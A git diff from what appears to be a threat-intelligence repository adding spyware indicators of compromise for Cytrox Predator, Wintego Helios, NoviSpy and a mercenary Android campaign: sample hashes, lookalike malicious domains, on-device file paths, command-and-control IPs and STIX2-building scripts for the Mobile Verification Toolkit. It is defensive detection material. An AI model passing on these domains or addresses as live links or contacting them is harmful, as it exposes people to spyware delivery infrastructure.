5fc3855146a45a75f41106524bee413a97ef8fcd3b23eb109251fa9aaa7e56c0
63efcbb541cd17a9b940e125a52245f50f06d5033b64ad7111be8d82202e3c37
63fd5ec198ada1e34f3b78d6508814c8f1f6a97e86c970a4cde983df2d828474
64736eacf92ec3f297876c864b078b291b9e49ffb142892b06bb1c03bf004346
67825351fe867a68d4964df5fda3baa66c1824c1f73db8b04f6c7d63c0b477bb
678a28ab42445ebe88f597f05eb3020bbac88a2cb61ac51933154dff41ce976d
695cbeb35e78511a5828f393fa9978f8a1a142538b713c758f0890f069169af6
6a665cca0bb0c83cd9ae27720e5a682dd2250cded9997fa88c29ea822147ce10
6be72daa38cbfc0f7f600b006577738bda352143575a9b376de64f87e27ac980
6c911a9bfbdd9284ea154aa56261df13ea97db3905b5b4900aebbd1dea7894aa
6d1ebd454a0f798c38b80934a0c2c532c6ba9c01ae43aa74a5111e8712fcb3af
6ee1129c19271a8cdd703c5bab956bc0245b83c0de0877dc4e532f0b842d0ef6
704060b8bd5a1625252d494a5cffd356bb7a3bb8b2fa4f44ac33fe7cea719619
71127f09ab0f102c63960c4dd5fcddef3a623db658fa918f59217556facc0c83
7181db982785232b5b6ba44f98f4e18a1064e06483789d4307abb966781f091c
71e79a3e76e8b7f8c4ff8acb6fb794b6d846e34173b2e34ea568fa0c3f189ba8
723c49b6bc5cccd13ae805076d6b241f3eb6d95eeb6fb8146b5b5db8a72dbdc4
7345788df57f6472fd3724ae7dc987bb2571df1708e079a0696e9f925bf8b8af
757c4bc97351828fefe3140db7675b8796ac0074e878c390814f00ef477d0c6e
7685e0fb8d5a472ac99d6f7fb8baa264c09db0b71ff3bc4f4f739850506dbabf
7785fbd8c4e480ab5ac7c9d02d7fa6b457d932547f8fabaca1a96eaf71e8971f
7a3900d7aac39a47a36a9851860c13c39ecabc21caae9b1184c0c769d83f1b96
7a8373b2cacbcb0c994f7566738166c8d46dae489c596b45724dfd93aea10ce1
7bb915cb73c26fa69f874246aff087c53eb8c576fda9829589d71908f5684c36
7c846942aeb5e5f93ffa7e765612140020ca98c9f8ad52118b73ac80cb2fd2b0
7ea3795cae9549856c1b818c97b367ab86c7d5d0b9518c19908a80805df95e16
80977881e905b50751726a493dea1de5119b272102fa8165f7812ec6cd004912
82181e75c02c326081a49ef577720dd7b9e6e3324a99407b8b8dc9b39b8af42a
82da611e11444eb9bd675013cb08a1cb23a84db416db3a2e661f939e70f273dc
857e0740c4f9713b7fd1b8eeccace22a928c4a90e2b0184246fb1057731d65df
858133f89d3b813c8236f772aa6c1d5b26ec90439995f3355f431928954c9883
859c5242bc3e6fbaa908c04c425c763481eb1b57e6ee55e1ab93bcd5c0ce28f7
8679db7a6241a4365fd7e99b993c9d450713a5feddd9c957fb4e7b74bcb6f31c
89615959c76d10cc5e995abbce4606b615d3ff7b3b376c589170f57a56be41c6
89b0563b6a41698b1d472114e3ab366d5ab2aa2581103cc3b0e82d695e30af01
8a52f2f82c9542a73634a65bc91ff818dd49d36925f020df88bc183069a5862e
8b755d12e948f1ff005c2837579b1034fa4cb1d646e8f67f12d162c6752d98bc
8be34e613b327df24b87dd4816296ea8ae106892af1bf0cfbb853ded334db85a
8c16078fd50c4492bf9ffc64bdcfba62806edd8e2982f4491dfc0aa80b45cabe
8c1d36687a8c8f4641a161a148cb663ac1fb68f6404c34017bf0c916d17e4c58
8ce0cbaf47ea950091072702112c9b7ee19bc45ec4582677399a59235e6bbdb9
8de9247d12fcd346cc200c5816defef304c0f40babf3f32c34ba8ff9f44c9bc8
909214f3ac67d907457524d9bf6383e25fc794e8efd0bcac737a5234b5d2321e
914e1a6506a1838cfd7b662711b113826938ce73c79baabd999a3cc33158bac5
944c2552499cab2e9307f3d9266b4fb230e829c3eea5b7ec377a73fdaa127c8d
953d1e9b11e8bdef6e1fd95e1436584c826f89120d3e7cb2d846b460d109c748
967b66f6f9985bf788b267b24d636ce9d019790b4ffa04a92fe299f2037438fe
96d534616342fad15441a939117bf9b0ed083c4d7d742f72ec61846400afc53f
9781e88c5ddf38b7071db08580f8c8ae4cb80f09ba002b3fb17733c5c794d389
98cb66e33e17c9dda3cf474fd0a5c27de53c58ad5921b80a2e1d4cdea5a7240a
9930d0fde796cb54fee8bf62a36f5bbab34193f23a288fc287527f2100791f32
995f7c609b5d501727cfb3f426ebed44597625702c4e122f80d5994340c0c8b9
9a5752b09cd3ccf1b63fb6c3bcba1ec2b851ea149957b1796eb254bd46dfe81c
9b7c84ea179899d882492a94be536696e604ee9f8c3c3605c00ec7c3ec5247ab
9d22d73ca3ddaad5c772f7715753c0be9c2cde6537657e7291d7a51a9e2c9d5b
9e8075224d5b6a26fcd9dcf166fcc1780bbb7841a535f09c18ff91edf68affde
9f64e537b3b89ed2e6a4f9b352c893e0b42a4c0a477a0242ba66de7622f20a8d
9fc0b0285408551e2ed82b3049b9b23368320a1e26edc173d59117af0c05db57
a026e0a61283352db37649afb4c925f5f089f4b12915c82cedbb98a69da3c4d6
a0e7b653d395f4173836d65e44742d67c2d93ce309dba79a2dc4c1d1647e7b5f
a21babfa96ba7a6d0884a0fa48a2d77c6b5a46a1c0eb184fa5e756a2eceb73d0
a24aae147599e8bf1e512998776affb19492fba18178f5bef6ab1a14b6f7827d
a25bd7ce1147ddc2afbbf148625717de355b166169e7063b43fff7cb60207b6b
a27de158f0474624cf5d72af9734093cee082756a5b5872c107af9da2b0d645a
a3675b44a37c6218c0a79803e786dc8b6068350988e0ddae527cf7781e6fe180
a6bead0b7e136a3fdf9fc5b5f83a50f00c04b33cfeeaf9eb4566eba2c8d24b1c
a9023f3798e2cd02b82dac3dd0c36077107fcf94bd7de74a5cd81a85492b01ca
a94fcda30047f9f96a9a07c95b20ecf657f2f0ce22cd22b8210b8cb4a9289108
aecfe539581b3397e4f2034b0534491ff71f21712a8001ff6f10e120ed7a4a09
b0b09a603abfeddfebfd6ef75ba096349426ff65993b94a6dea957c1a4cdebfc
b1c92fda68449d85eb927aec1bfb4a3eb558f723d425be22cd254afaf586a54c
b46a0e341d7424b5fc8560eef3ee6684474559b6723e03f4d8eace8893322c9d
b488b7c2e35ddfb16557ad756aa400d6c4877dfb5ebf59df78dfcd60c14c5f17
b583ae22c9022fb71b06ec1bae58d0d40338432b47d5733bf550972c5cb627c4
b5a3bb48365b5550aad90f4f978df2045a119b8d8a9dbfbdb698cec65e888a3d
b81b935cec633ac04bc29da6c2f0752e53c2b36cfafb7d7a2657c4df9f9eff5f
b865052b8364c981ce3c44265a986eb68448ff24f98a2a535b2704944b304968
b98499b0dcb733cd251113338049e3200e9ccc3425a6e636ef903b478819b817
ba1055f9ff8db67e7220b7cec5a42e7e27cf2089e6bdf229cdcbf7c71f04735f
bf43171a31d241e0e98b6ae968784b7a51401a80012638a500d2afe20f5eaef7
c08f7396419ca9eece9526c19f24bf1a7df34d8ead511775b5ccc92c16affce3
c28ed0e96349c09ef2e2e8257a5fa402d89da0ca7922b3c51ba434ebb7aa3b1e
c3a8205f21362674e70226fba1bcc2d288b3bb9699ee344ba54a11266e3e7f02
c3e443d7b36cea341bb3bd0fe17d9a4e7eb73097415eeebc7a63a56d4ec6ba00
c4971a65af3693896fdbb02f460848b354251b28067873c043366593b8dbc6f9
c5f86ccc828ee733e081157d1b79c9b67619982d88bb1e4dd4b1d357d682dc03
c635cafdcf0b8e7036119608e2383ba454561f77bdbabdc1f4c6afd5165b6172
c6e2bc138aed1085319ac4306c814754ed37d7815ad646365ca5c0b9c08c06e7
c8958024380cc6224770dbb5a1c8564e62dc9e58ec9b8190630b8510e679e4b4
caab79bd08b1627f265e66bf56166d6b0629c5c8c6044e53cc6e0b9dff58980c
cc038422472ab00be3224b05068db70dcfe3336fb7d50d6fe6522eb503d6f0cd
cd5f246c64f0fc2bd83020638dc5ab684132f480514f45b70da6809228a6f4d0
d0392e7721276b9c034f1f45de85180fc1e73c13e301853b89c5dd57d00b218b
d1f631388513e18abd899b0b3e6aa883852d1a767e7cd9f4e19ca7027e90cb83
d29f7748c0bdda3ff7142d3021df37a40fcb73ce0db4f43173b17d9c2f41a739
d355c44651885eb1ec4f2fcf6b408c6b7ea6c12bb0911a72216fbb9d3f25b1ef
d4348f68190dce400c95c67b0d78261f7ec0e9d31e78ddbe106f1db03baa4465
d46bb606e15061ddaec5e19b048d4894655da83f1896c27b6578c524fa4748a3
d47acea1c36d3b5c6dc191e9fc211bb5ef0f59cc0fd0b26e751ed351833bc04d
d68189997b848be45c8ee82761411f7928224662c3a8fe908073bc4cc3a74106
d742678b5ca6f12e33b455065537237ee5444a826f89658346658b7ad52bbbc1
d7c12e843424d5a38d792a6d0be99deabb1dccf72b83503bd8190682d34f82f0
d9022c0c0c0f3b5ac9f67125636920cdfaf99e97085dff407d15bc2954584472
d9df4124f25ea125016a9219e336fac90617f105b0342d2c47d742a1902430d7
d9f346b3d13d8cc580166e4484bf2bb86fb799e50bdba6d72175311c92f19491
daa22b90ba420ac0d8bbe4286f891023464affdcc5de35fe06f915b222fd9c41
de2c61282c62f86eae60f8441296a9e67b608c60e292592ca4f7a94fa225a012
df0fc297bf1badebaa2f399e5d339dc54b4644fe04c661961fb86e9a3585960d
e06deced1a4a4aa87b20326aa348efbe43156da4339155e154f3d439298f7aa9
e141941d2b0306968ad4385f2c8a818b5d7de0a976db44c850367b82f3c98558
e1bc93ab028214ee01e67e5585f4748b0ae7b816f327013a5f2757d34a47ec82
e1d721eb3d2973ebb4a5d2bc613de732de30c6fa8374658b3ff1247521b76799
e27a6aaa0d8b4882590e2dae18267e8f6fd79b24b4c54e8d926d2d0dbd74e056
e50e93856506f837167fee9e54a8cfd75e747ad19f6804689cd6c8b01e64dea3
e58cb5028c47c9edafd0998cfd2fb1ee0ac4a06f8dd8d07e720dd96b0d8a3563
e6333193cf02dde8604158abfdc1159b7e9136f5b0bf4aa1944c9d5a36aa4232
e705ec4d70010736afbca9a4561f411f71a7a0de8336295d3021d26d9d3f8a6d
e74984b8c8a2ef53e6f202922380ed3e89d58a8585e063a2cf75995863f5fa47
e7bb56c2c41a4a97e8ff3e06a9f7ce560e9ad3477451be403678dc304a68508d
e7f441a7da2f3e247d06075053e680f3ce82ce16b053c849b647cdd20d044bb3
e8605854c8730d2e80d8a5edd8bc83eb7c397a700255754ec9140b9717f7d467
eb7960b2dad8ff73c9fd0105753470b333e728b0ea6c7de9b4cdda658e2d292d
eba10541ec72824f339085056aa3cc39f369cdf0a9948bcdd10cd47a7f36a7ed
ecfe93ab58e0c3d2a0d5984d7a6f9fdd4f566c9c8dcd6e777d16e52d5a44bc8a
ed3b1d2d8737e8464bc4795f7485c873408b5b1ee2158f0368d1ec328a6b0265
ed5e30d2baa5dbb969753d6f8815a72a88587e3ba32082e5a16b0aa95ef73c83
ed9d7b7cb4eb915f9af3e8e3bf99e866023789e859fb5f97833ae21609bad915
f190e0e2a9ae04cc5e0347562070b0d464e06a9234c61f20c9903e0abeabccf1
f5487b4beda4433757476faf9c48fa778f7619ddb29f541a01c6f215460d311b
f5942a25096deb04a42c8cf73d3b797f93e2e39ab11639ff43dc2004abcef2b9
f937c72487b6494f384e62ca952119656182c6e224a86921f2c267b5ec45699b
fa19ee10791a408d7626fe68f19f43850619a2dcc0d418711f41792c3cac1c32
fe8c465e9f94fb41180f3142f6dde258932dabb811cbaed6e161db38a4def620
ff4a07a54b117bc135ae08c31ebb8470110f78c94177d469dc7ef75d473f5ca8
81b4a8f6ff2489e01f6b09126583673d3df922a0bbf7ff2cbcef2bcf6102b951
9714f54722cf3c2d94322671cacd8f2e1fedf66209063f2746d2a81bf0af7f08
6b8be2c4b7d0dc6f3e5112fb956ee8f63b54b0706b21090194356e83a80897d4
1dff310b4521c6836bba41d42c280b12a0b181dfad7146f951ed155c6707f231
08f1e1cd16667e24b270a5eb661e8ac329eb50677edebe0f9565e213f49908ab
b040fac8dcd0515cadaced0221ea1a71b22bd68d4f532bd542ba1145242cd742
7796b1297e4c6cde9ca8d22b2ec92c21b5fa135ec6b95c6812ba0c77e49857f0
4da6745681ba930312acba7fdf93a9dc0f609a2f03d1d1b597d14e1ed4726446
b16d10e933efd201f694402561f9c6c58873a45284eaf2b5206fe28ff4dc98d3
de8a5a98a9090b224d742e0c72f5e36d84fae4da55d26775b09521997f18253c
0f8e3679d707a17c2255f517afcfc9a0971e787d88e0002c290702d01aebc33e
74b64679b71ecb971881211215283d48ada2ad7727c00f88d4351ab23cf0229a
86387e535ac53787cbac192e6715239b6154a664ccffbf72b4c6038800d7cb86
0f8ca9e39e0ac7cad7f4b2887bce580eebcffe57d2e253ddd635896e056688be
a57fdc3deba23dc2fed39f3bc9538104d4f1bce61557e3ae649664f091dd0e89
0639eae0996df85b097e32dd6dc983643438e54679b12f24ed6df66e2ef90217
e3f6c813a4582f7effba4ba0a582b8c80ebfd86d551dd50b7fffa9664cd28a50

View File

@@ -0,0 +1,11 @@
# Cytrox Spyware Indicators of Compromise
This repository contains network and device indicators of compromised (IoCs) related to the IOS and Android spyware tools developed by the cyber-surveillance company Cytrox. These indicators were first published in December 2021 by Meta in their [Threat Report on the Surveillance-for-Hire Industry](https://about.fb.com/news/2021/12/taking-action-against-surveillance-for-hire/) and by Citizen Lab in their report [Pegasus vs. Predator - Dissidents Doubly-Infected iPhone Reveals Cytrox Mercenary Spyware](https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/). Additional indicators of compromise were identified by the Amnesty Tech Security Lab as part of an independent investigation.
The STIX2 file can be used with the [Mobile Verification Toolkit](https://github.com/mvt-project/mvt) to look for potential signs of compromise on Android phones and iPhones.
It includes the following files:
* `config_profiles.txt`: UUID of suspicious configuration profiles dropped by the Cytrox spyware
* `cytrox.stix2`: [STIX2](https://oasis-open.github.io/cti-documentation/stix/intro.html) file containing all indicators
* `domains.txt`: list of Cytrox domains
* `file_paths.txt`: file paths for Cytrox payloads on disk in Android and iOS.

View File

@@ -0,0 +1 @@
76DAB334-7E17-475D-A5D6-0794EB5818A5

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,336 @@
2y4nothing.xyz
5m5.io
actumali.org
addons.news
adibjan.net
adservices.gr.com
adultpcz.xyz
advertsservices.com
advfb.xyz
affise.app
almasryelyuom.com
alpineai.uk
alraeeenews.com
alraeesnews.net
altsantiri.news
amazing.lab
ancienthistory.xyz
android-apps.tech
api-apple-buy.com
api-telecommunication.com
applepps.com
apps-ios.net
aramexegypt.com
atheere.com
audit-pvv.com
bank-alahly.com
bbcsworld.com
bi.tly.gr.com
bi.tly.link
bit-li.com
bit-li.ws
bit-ly.link
bit-ly.org
bitlinkin.xyz
bitlly.live
bitlyrs.com
bitt.fi
bity.ws
bityl.me
blacktrail.xyz
bmw.gr.com
bookjob.club
browsercheck.services
bumabara.bid
burgerprince.us
businesnews.net
canyouc.xyz
carrefourmisr.com
cbbc01.xyz
celebrnewz.xyz
cellconn.net
charmander.xyz
chatwithme.store
citroen.gr.com
ckforward.one
clockupdate.com
cloudstatistics.net
cloudtimesync.com
cnn.gr.com
conlnk.one
connectivitycheck.live
connectivitycheck.online
connectivitychecker.com
contents-domain.com
covid19masks.shop
crashonline.site
cut.red
cyber.country
danas.bid
distedc.com
download4you.xyz
dragonair.xyz
eagerfox.xyz
ebill.cosmote.center
edolio5.com
efsyn.news
efsyn.online
eg-gov.org
egyqaz.com
elpais.me
emvolio-gov.gr
engine.ninja
enigmase.xyz
enikos.news
ereportaz.news
espressonews.gr.com
etisalategypt.tech
etisalatgreen.com
ewish.cards
fastdownload.me
fastuploads.xyz
fbc8213450838f7ae251d4519c195138.xyz
ferrari.gr.com
ffoxnewz.com
fimes.gr.com
fireup.xyz
fisherman.engine.ninja
flash.gr.com
flexipagez.com
forwardeshoptt.com
getsignalapps.com
getsignalapps.live
getupdatesnow.xyz
goldenscent.net
goldenscint.com
goldescent.com
gosokm.com
guardian-tt.me
guardnew.live
guardnews.live
heaven.army
heiiasjournai.com
hellasjournal.company
hellasjournal.website
hellottec.art
hempower.shop
hopnope.xyz
icloudeu.com
icloudflair.com
iibt.xyz
ikea-egypt.net
ilnk.xyz
in-politics.com
inews.gr.com
infosms-a.site
inservices.digital
insider.gr.com
instagam.click
instagam.in
instagam.photos
instegram.co
insurance.gr.com
invoker.icu
ios-apps.store
iosmnbg.com
itcgr.live
itly.link
itter.me
jquery-updater.xyz
kathimerini.news
kinder.engine.ninja
koenigseggg.com
kohaicorp.com
koora-egypt.com
kormoran.bid
kranos.gr.com
lamborghini-s.shop
landingpg.xyz
landingpge.xyz
leanwithme.xyz
lexpress-mg.xyz
lexpress.me
lifestyleshops.net
limk.one
link-m.xyz
link-protection.com
linkit.cloud
linkit.digital
linktothisa.xyz
liponals.store
live24.gr.com
livingwithbadkidny.xyz
llinkedin.net
lnkedin.org
localegem.net
lubentv.com
lylink.online
makeitshort.xyz
md-news-direct.com
mifcbook.link
miniiosapps.xyz
mitube1.link
mlinks.ws
mobnetlink1.com
mobnetlink2.com
mobnetlink3.com
mozillaupdate.xyz
msas.ws
mycoffeeshop.shop
myfcbk.net
mytrips.quest
myutbe.net
mywebsitevpstest.xyz
nabd.site
nabde.app
nassosblog.gr.com
nemshi-news.live
nemshi-news.xyz
nemshi.net
networkenterprise.net
newsbeast.gr.com
newslive2.xyz
newzeto.xyz
newzgroup.xyz
niceonase.com
niceonesa.net
nikjol.xyz
nissan.gr.com
novosti.bid
oilgy.xyz
olexegy.com
olxeg.com
omanreal.net
omeega.xyz
onlineservices.gr.com
orangegypt.co
orchomenos.news
otaupdatesios.com
paok-24.com
pastepast.net
pdfviewer.app
playestore.net
pocopoc.xyz
politika.bid
politique-koaci.info
prmopromo.com
pronews.gr.com
protothema.live
proupload.xyz
ps1link.xyz
ps2link.xyz
quickupdates.xyz
qwert.xyz
qwxzyl.com
redeitt.com
redirecting.live
redirecting.page
safelyredirecting.com
safelyredirecting.digital
sepenet.gr.com
sephoragroup.com
servers-mobile.info
serviceupdaterequest.com
sextape225.me
shortely.xyz
shorten.fi
shortenurls.me
shortmee.one
shortwidgets.com
shortxyz.com
simetricode.uk
sinai-new.com
sitepref.xyz
smsuns.com
snapfire.xyz
sniper.pet
solargoup.xyz
solargroup.xyz
speedy.sbs
speedygonzales.xyz
speedymax.shop
sports-mdg.xyz
sportsnewz.site
static-graph.com
stonisi.news
supportset.net
suzuki.gr.com
svetovid.bid
symoty.com
syncservices.one
synctimestamp.com
syncupdate.site
telecomegy-ads.com
telenorconn.com
tesla-s.shop
teslal.shop
teslal.xyz
teslali.com
tgrthgsrgwrthwrtgwr.xyz
timestampsync.com
timeupdate.xyz
timeupdateservice.com
tiny.gr.com
tinylinks.live
tinyulrs.com
tinyurl.cloud
tiol.xyz
tly.gr.com
tly.link
tokoulouri.live
tovima.live
trecv.xyz
trecvf.xyz
tribune-mg.xyz
trkc.online
tsrt.xyz
tvxs.news
tw.itter.me
twtter.net
ube.gr.com
uberegypt.cn.com
updates4you.xyz
updateservice.center
updatetime.zone
updatingnews.xyz
updete.xyz
url-promo.club
url-tiny.app
uservicescheck.com
uservicesforyou.com
utube.digital
viva.gr.com
vodafoneegypt.tech
vodafonegypt.com
vouliwatch.gr.com
wavekli.xyz
we-site.net
weathear.live
weathernewz.xyz
weathersite.online
webaffise.com
wha.tsapp.me
worldnws.xyz
wtc1111.com
wtc2222.com
wtc3333.com
xf.actor
xnxx-hub.com
xyvok.xyz
yallakora-egy.com
yo.utube.digital
yo.utube.to
youarefired.xyz
yout.ube.gr.com
youtu-be.net
youtub.app
youtube.gr.live
youtube.voto
youtubesyncapi.com
youtubewatch.co
yuom7.net
z2a.digital
z2adigital.cloud
z2digital.cloud
zougla.gr.com
zougla.news

View File

@@ -0,0 +1,6 @@
/private/var/tmp/UserEventAgent
/private/var/tmp/com.apple.WebKit.Networking
/private/var/tmp/hooker
/private/var/tmp/takePhoto
/data/local/tmp/wd/fs.db
/data/local/tmp/wd/

View File

@@ -0,0 +1,41 @@
import sys
import os
from stix2.v21 import (Indicator, Malware, Relationship, Bundle, DomainName)
if __name__ == "__main__":
if os.path.isfile("cytrox.stix2"):
os.remove("cytrox.stix2")
with open("config_profiles.txt") as f:
configs = list(set([a.strip() for a in f.read().split()]))
with open("domains.txt") as f:
domains = list(set([a.strip() for a in f.read().split()]))
with open("file_paths.txt") as f:
filepaths = list(set([a.strip() for a in f.read().split()]))
res = []
malware = Malware(name="Predator", is_family=False, description="IOCs for Cytrox Predator")
res.append(malware)
for d in domains:
i = Indicator(indicator_types=["malicious-activity"], pattern="[domain-name:value='{}']".format(d), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
for f in filepaths:
i = Indicator(indicator_types=["malicious-activity"], pattern="[file:path='{}']".format(f), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
for c in configs:
i = Indicator(indicator_types=["malicious-activity"], pattern="[configuration-profile:id='{}']".format(c), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
bundle = Bundle(objects=res)
with open("cytrox.stix2", "w+") as f:
f.write(bundle.serialize(indent=4))
print("cytrox.stix2 file created")

View File

@@ -0,0 +1,4 @@
# New Android Hacking Campaign Linked To Mercenary Spyware Company
This folder contains IOCs related to the report [New Android Hacking Campaign Linked To Mercenary Spyware Company](https://www.amnesty.org/en/latest/news/2023/03/new-android-hacking-campaign-linked-to-mercenary-spyware-company/)

View File

@@ -0,0 +1,3 @@
sys.brand.note
sys.brand.notes
sys.brand.doc

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1 @@
/data/local/tmp/dropbox

View File

@@ -0,0 +1,40 @@
import sys
import os
from stix2.v21 import (Indicator, Malware, Relationship, Bundle, DomainName)
if __name__ == "__main__":
if os.path.isfile("malware.stix2"):
os.remove("malware.stix2")
with open("domains.txt") as f:
domains = list(set([a.strip() for a in f.read().split()]))
with open("file_paths.txt") as f:
filepaths = list(set([a.strip() for a in f.read().split()]))
with open("android_properties.txt") as f:
properties = list(set([a.strip() for a in f.read().split()]))
res = []
malware = Malware(name="MercenarySpywareCampaign", is_family=False, description="Targeted campaign by a mercenary spyware company")
res.append(malware)
for d in domains:
i = Indicator(indicator_types=["malicious-activity"], pattern="[domain-name:value='{}']".format(d), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
for f in filepaths:
i = Indicator(indicator_types=["malicious-activity"], pattern="[file:path='{}']".format(f), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
for p in properties:
i = Indicator(indicator_types=["malicious-activity"], pattern="[android-property:name='{}']".format(p), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
bundle = Bundle(objects=res)
with open("malware.stix2", "w+") as f:
f.write(bundle.serialize(indent=4))
print("malware.stix2 file created")

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,11 @@
# Wintego Helios Indicators of Compromise
This repository contains network indicators of compromise (IoCs) related to the Helios spyware developed by cyber-surveillance company Wintego. The Helios spyware is designed to target and compromise Android devices. It is unclear if they spyware is also capable of targeting iPhones. Not the Wintego Helios spyware is unrelated to the *Predator spyware* from Intellexa which has also at times been marketed as *Helios*.
These indicators were identified through internet scanning and other research efforts by the Amnesty International [Security Lab](https://securitylab.amnesty.org/). More information about Wintego and their spywareproducts can be found in the [A Web of Surveillance](https://securitylab.amnesty.org/latest/2024/05/a-web-of-surveillance/) report which is wider investigation into the sales of [spyware and surveillance products to Indonesia](https://securitylab.amnesty.org/latest/2024/05/global-a-web-of-surveillance-unravelling-a-murky-network-of-spyware-exports-to-indonesia/).
The STIX2 file can be used with the [Mobile Verification Toolkit](https://github.com/mvt-project/mvt) to look for potential signs of compromise on Android phones and iPhones.
It includes the following files:
* `domains.txt`: list of Wintego Helios spyware domains

View File

@@ -0,0 +1,175 @@
africatech.eu
afrinews.eu
alertanalysis.org
all-life-fitness.org
androidcheckupdate.com
androidsensorfirmware.net
applibraryupdate.network
arninja.eu
astroplanet.org
ateliernow.org
autotechhelp.net
backpackerreviews.org
basketballreviews.org
bbc.bio
bbc.tf
beaconzero.net
bestgeometry.org
bestgreenblog.org
bestsflix.net
biceptech.org
bincoupon.com
bitsinflow.net
biznetforum.eu
blastermaster.eu
boxmaster.org
boxpearl.eu
businesspractice.org
cafelatenow.com
carepile.net
caretechno.net
caronspot.co
cartechnews.net
celltechnollogy.com
cloudysystems.org
cnn.gallery
coffeedirectory.org
computer-repair.org
coolbrandlabs.com
coralspire.net
craftsplex.net
daily-tech.eu
dakaractu.news
daysomega.com
dealsenterprise.com
decofusion.eu
deepearnings.net
designercellular.com
dialrooms.eu
dinnerfit.org
doctorstar.org
draftshape.net
drinksnow.org
driverhacks.net
echoswift.net
ericshop.org
expandingtech.net
expressotelecom.eu
falconstudio.eu
fansclear.net
financeanalyzer.net
fitnessstar.org
flexibilycompany.org
flipcollective.eu
flyrick.net
foodystudio.org
gaincharts.net
gainthepain.com
galaxy-toolkit.net
galaxy-update-check.com
galaxyupdate.network
galaxyupdatecheck.com
gamingtoday.org
getappnion.org
getinstitution.org
gettechnology.org
globalbikeshop.org
gotechtube.com
hikewithmike.eu
hiphopreviews.org
hirecheapcar.com
history-guidance.net
hugetech.org
intech.so
internationalre.org
jeuneafrique.eu
jeuneafrique.news
jotnanews.co
jotnanews.fr
jotnanews.live
laneandco.org
laptoptech.org
lidarfirmwareupdate.network
localsystems.org
lovekitchen.org
loyalpro.org
loyarbox.org
mambaweb.org
maplebook.org
medatcost.co
michealblog.org
misoshiru.eu
mylaylastore.org
netprotector.org
nicetreasures.com
numbersnews.org
oneinfluence.org
onlineshoppingnetwork.org
paperscissors.net
penlife.org
piratetv.org
playerselection.eu
powerway.org
proteinreviews.org
pythonsystems.org
quickfindnow.net
realmac.org
recipeadvice.eu
reordertree.net
restroad.eu
restroad.net
risetech.one
riskdrive.eu
runningmart.org
securefilter.net
selfblank.net
selfhelptech.org
senedroid.net
senego.fr
senego.info
seneweb.eu
seneweb.news
sensomatics.net
serverdetails.click
setupvalue.net
singoffice.net
sodahub.org
solararcade.eu
solargeotech.net
spacevocal.net
sporthome.org
startupfit.org
storm-tech.org
swiftecho.eu
swimaster.org
swimmingcompany.org
syndicationcdn.com
taminessentials.net
techarmys.com
techarmys.net
techdeliver.cc
technarrow.net
ten-group.eu
theholder.org
thesoundyou.org
tiktok.do
tilesget.net
tipvortex.net
topmark24.org
travelow.org
tribunnews.org
triptrick.net
trvelingguide.org
ultrajewelery.net
unlockcredit.net
ups.so
urbanthree.eu
vision-tech.org
waterfit.org
wateringreviews.org
webjars.net
webtechuse.net
whiskytango.net
witquote.com
yachtatdock.com
yogurthome.org

View File

@@ -0,0 +1,24 @@
import sys
import os
from stix2.v21 import (Indicator, Malware, Relationship, Bundle, DomainName)
if __name__ == "__main__":
if os.path.isfile("wintego_helios.stix2"):
os.remove("wintego_helios.stix2")
with open("domains.txt") as f:
domains = list(set([a.strip() for a in f.read().split()]))
res = []
malware = Malware(name="Wintego Helios", is_family=False, description="IOCs related to the Wintego Helios spyware")
res.append(malware)
for d in domains:
i = Indicator(indicator_types=["malicious-activity"], pattern="[domain-name:value='{}']".format(d), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
bundle = Bundle(objects=res)
with open("wintego_helios.stix2", "w+") as f:
f.write(bundle.serialize(indent=4))
print("wintego_helios.stix2 file created")

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,14 @@
# NoviSpy Indicators of Compromise
This repository contains indicators of compromise (IoCs) related to the **NoviSpy** Android spyware used by Serbian authorities to target activists and journalists. The NoviSpy spyware has been covertly installed on target Android devices using physical access while at the offices of the Serbian Security Intelligence Agency or police. It is unclear if they spyware is also capable of targeting iPhones. NoviSpy appears to have been developed specifically for the Serbian security services.
These indicators were identified through forensic research by the Amnesty International [Security Lab](https://securitylab.amnesty.org/). More information about the Serbian **NoviSpy** spyware can be found in the Amnesty International's report ["A Digital Prison": Surveillance and the suppression of civil society in Serbia](https://securitylab.amnesty.org/latest/2024/12/serbia-a-digital-prison-spyware-and-cellebrite-used-on-journalists-and-activists/).
The STIX2 file can be used with the [Mobile Verification Toolkit](https://github.com/mvt-project/mvt) to look for potential signs of compromise on Android devices. It should be possible to detect this spyware in Android *bugreports*, and AndroidQF extractions.
It includes the following files:
* `domains.txt`: List of C2 IPs used in NoviSpy spyware samples
* `package_cert_hashes.txt`: Hashes of Android APK signing certificates used by NoviSpy.
* `package_names.txt`: Android package names used in NoviSpy samples.
* `sha256.txt`: Hashes of NoviSpy spyware samples

View File

@@ -0,0 +1,7 @@
195.178.51.251
79.101.110.108
188.93.127.34
178.220.122.57
94.140.125.174
185.86.148.174
176.223.111.131

View File

@@ -0,0 +1,77 @@
import sys
import os
from stix2.v21 import (Indicator, Malware, Relationship, Bundle)
from stix2 import CustomObservable
# @CustomObservable('x-new-observable-2', [
# ('a_property', properties.StringProperty(required=True)),
# ('property_2', properties.IntegerProperty()),
# ], [
# 'a_property'
# ])
# class NewObservable2():
# pass
def hash_format(hash):
if len(hash) == 32:
return "md5"
elif len(hash) == 40:
return "sha1"
elif len(hash) == 64:
return "sha256"
else:
return None
if __name__ == "__main__":
stix2_file_name = "novispy.stix2"
if os.path.isfile(stix2_file_name):
os.remove(stix2_file_name)
with open("domains.txt") as f:
domains = list(set([a.strip() for a in f.read().split()]))
with open("package_names.txt") as f:
package_names = list(set([a.strip() for a in f.read().split()]))
with open("package_cert_hashes.txt") as f:
package_cert_hashes = list(set([a.strip() for a in f.read().split()]))
with open("sha256.txt") as f:
sha256_hashes = list(set([a.strip() for a in f.read().split()]))
res = []
